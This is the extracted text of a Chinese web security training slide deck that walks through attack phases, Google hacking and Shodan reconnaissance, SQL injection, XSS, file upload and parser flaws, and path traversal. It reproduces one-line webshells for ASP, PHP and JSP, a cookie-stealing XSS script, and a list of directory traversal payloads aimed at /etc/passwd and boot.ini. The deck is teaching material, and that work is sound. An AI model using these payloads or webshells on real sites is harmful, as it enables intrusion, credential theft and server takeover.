Web应用安全之常见威胁

©2011绿盟科技安全之常见威胁绿盟科技关于我公司：绿盟科技职位：安全工程师方向：安全测试安全培训安全管理安全咨询张煜我们的目标2Web常见安全威胁3Web安全漏洞防范1Web安全概述Web毫无疑问是当下最流行的应用web2.0高速发展WEB代表一个企业的形象Web也是当下最流行攻击web应用程序脆弱性WEB攻击门槛较低网站安全威胁暴力破解目录遍历攻击者网站服务提供者名誉受损网页篡改信息窃取非法入侵拒绝服务网站服务提供者网站访问者个人信息丢失公信力下降权限失控网站服务提供者基础网络提供者网站访问者可用性破坏信息篡改越权访问网站安全监测情况网页篡改情况2016年，我国境内被篡改的网站数量为16758个（去重后），较2015年的24550个下降31.7%网站后门情况2016年，国家应急响应中心共监测到境内82072个（去重后）网站被植入后门，其中政府网站有2361个。网站仿冒情况2016年，国家应急响应中心我国共抽样监测到仿冒我国境内网站的钓鱼页面177988个，涉及境内外20089个IP地址。我们的目标2Web常见安全威胁3Web安全漏洞防范1Web安全概述WEB应用安全威胁5痕迹清理（Cleaning）4权限提升（Hacking）3漏洞挖掘（Digging）2漏洞探测（Scanning）1搜集信息（Searching）1.搜集信息尽可能多地收集目标应用程序信息搜集信息•GoogleHacking–Google–Google语法•Intitle•Inurl•Intext•Site•Filetype•…利用搜索引擎搜索信息来进行入侵的技术和行为。搜集信息搜集信息搜集信息搜集信息搜集信息•Wooyun搜集信息信息搜集JavaRMI远程反序列化任意类及远程代码执行解析(CVE-2017-3241)port：1099country:china物联网设备，如大华摄像头Dahua详细解析-开放端口、地图功能Shodan是一个搜索引擎，但它与Google这种搜索网址的搜索引擎不同，Shodan是用来搜索网络上在线设备的，你可以通过Shodan搜索指定的设备，或者搜索特定类型的设备。SHODAN•防止被“爬”–Robots.txt–进行访问控制–避免易理解的名称，如：AdministratorLogin–重要备份不要在WEB目录中存放信息搜集后台管理地址WEB应用安全威胁5痕迹清理（Cleaning）4权限提升（Hacking）3漏洞挖掘（Digging）2漏洞探测（Scanning）1搜集信息（Searching）•端口扫描–主流方式•TCPConnectScan•TCPSYNScan•UDPScan漏洞探测SNMP查询回复请求无应答等待至超时UDP161端口开放扩展：其他扫描方式1.TCPNull2.TCPFIN3.TCPACK4.…………漏洞探测端口开放情况探测服务/应用类型版本信息漏洞探测包暴力破解弱口令分析响应包查询漏洞库•WEB漏洞扫描器漏洞探测WEB应用安全威胁5痕迹清理（Cleaning）4权限提升（Hacking）3漏洞挖掘（Digging）2漏洞探测（Scanning）1搜集信息（Searching）漏洞挖掘数据及漏洞的深度挖掘漏洞挖掘扫描结果归类但是更多的是需要经验进行手工挖掘客户端攻击类型•内容欺骗•跨站脚本攻击逻辑攻击类型•功能滥用•拒绝服务•反自动化不充分•过程验证不充分命令执行类型•缓冲区溢出•LDAP注入•系统命令执行•SQL注入•Xpath注入信息泄露类型•信息泄露•目录遍历•资源位置可预测认证类型•暴力猜测•弱口令授权类型•凭据/会话预测•授权不充分•会话固定SQL注入`/login.jsp系统管理员系统管理员登陆场景:Stringquery=SELECT*FROMusersWHEREuserName='+用户名变量+'ANDpassword='+密码变量+';ResultSetrs=stmt.execute(query);输入用户名：admin输入密码：admin@123Select*fromuserswhereuserName=‘admin’andpassword=‘admin@123’;`/login.jsp系统管理员系统管理员登陆场景:Stringquery=SELECT*FROMusersWHEREuserName='+用户名变量+'ANDpassword='+密码变量+';ResultSetrs=stmt.execute(query);输入用户名：’or1=1or‘输入密码：123Select*fromuserswhereuserName=‘’or1=1or‘’andpassword=‘123’;SQL注入SQL注入案例展示SQL注入案例展示保存为TXT文件SQL注入案例展示当前数据库SQL注入案例展示表信息SQL注入案例展示列信息SQL注入案例展示字段值信息•跨站脚本攻击跨站脚本攻击XSSStringtitle=request.getParameter(“search”);….span%=search%/span•跨站脚本攻击（XSS）漏洞，从本质上来说就是将数据注入到了静态脚本代码中（HTML或者Javascript等），当浏览器渲染整个HTML文档的过程中触发了注入的脚本，导致了XSS攻击的发生。=scriptalert(/xss/)/script•跨站脚本编制——小弹窗，大危害跨站脚本攻击XSS跨站脚本攻击XSSscriptwindow.location.href='='+document.cookie/scriptspanscriptwindow.location.href='='+document.cookie/scriptspan客户端脚本文件：文件上传漏洞•常见的脚本后门分为功能完整的大后门（大马）和短小精悍的一句话后门,在服务器装有杀毒软件的情况下,大后门往往是被消灭的对象。所以一句话后门木马越发受到重视和青睐：–ASP一句话木马：%executerequest(“l”)%–PHP一句话木马：?phpeval($_POST[cmd])?–JSP一句话木马：%if(request.getParameter(f)!=null)(newjava.io.FileOutputStream(application.getRealPath(\\)+request.getParameter(f))).write(request.getParameter(t).getBytes());%•上传大木马上传漏洞•一句话木马+“菜刀”上传漏洞•上传文件漏洞——绕过检查机制上传木马上传漏洞1.客户端Javascript校验2.服务器校验A.文件头content-type字段校验B.文件内容头校验C.后缀名黑名单校验3.服务器解析漏洞A.IIS5.x-6.x解析漏洞B.IIS7.5解析漏洞C.apache解析漏洞D.nginx解析漏洞能被解析的文件扩展名列表：jspxjspf会以jsp方式解析asaceraspx会以asp方式解析php3php4会以php方式解析上传漏洞目录解析形式：原理:服务器默认会把.asp，.asa目录下的文件都解析成asp文件。文件解析形式：原理：服务器默认不解析;号后面的内容，因此xx.asp;.jpg便被解析成asp文件了。解析文件类型IIS6.0默认的可执行文件除了asp还包含这三种:/test.asa/test.cer/test.cdx上传漏洞解析文件类型Apache解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如test.php.owf.rar“.owf”和”.rar”这两种后缀是apache不可识别解析，apache就会把wooyun.php.owf.rar解析成php。（1）如果在Apache的conf里有这样一行配置AddHandlerphp5-script.php这时只要文件名里包含.php即使文件名是test2.php.jpg也会以php来执行。（2）如果在Apache的conf里有这样一行配置AddTypeapplication/x-httpd-php.jpg即使扩展名是.jpg，一样能以php方式执行。其他配置缺陷•任意文件访问——路径穿越下载漏洞在浏览器的地址栏输入下列地址：=../../Apache2.2/logs/access.log此时，文件访问路径就变成了：C:\AppServ\Apache2.2\logs\access.log这表明要打开Apache服务器内的日志文件access.log！服务器日志文件access.log应该是只能让网站管理员查看，但是黑客利用目录穿越攻击，就能够随便地打开、查看，甚至执行网站内的绝密文件。任意文件访问——路径穿越•常见WEB目录遍历攻击下载漏洞\..\..\..\..\..\..\..\boot.ini%00.html/..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini%00.html/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini%00.html/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/\\..\\..\\..\\..\\..\\..\\..\\boot.ini/..\../..\../..\../../boot.ini../../winnt/win.ini%00&ref=1../../../../../boot.ini%00/../../../../../../../boot.ini%00.html..%5C..%5C..%5C..%5C/boot.ini%00.html..%c1%9c..%c1%9c..%c1%9c../boot.ini/%c0%ae%c0%ae/boot.ini..%255c../windows/win.ini/../../../../../../../etc/passwd/../../../../../../../etc/passwd%00.html/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00.html/%2E%2E/%2E%2E/%2E%2E/etc/passwd/%2E%2E/%2E%2E/etc/passwd%00.html•Cookie欺骗攻击方法:–修改或增加cookie,来绕过脚本代码的限制•Cookie欺骗典型错误代码:–name=request.cookie(“name”)–Ifname=“”then‘只验证了name是否为空••••response.write“请先登录”Response.endElseDoSomeActs….–Endif•Cookie欺骗典型步骤:–需要白盒审计,来确定是否有cookie欺骗漏洞cookie欺骗Struts2命令执行漏洞java.lang.Runtime.getRuntime().exit(1);//即将web程序关闭Java反序列化漏洞JAVARMI反序列化暴力猜解越权访问-直接对象引用用一个ID就能安全地标示身份？越权访问-直接对象引用使用工具对保单号进行遍历，本次遍历的值为000000423884$08088$，运行几分钟后，根据返回页面大小判断是否存在可利用信息，如下图：用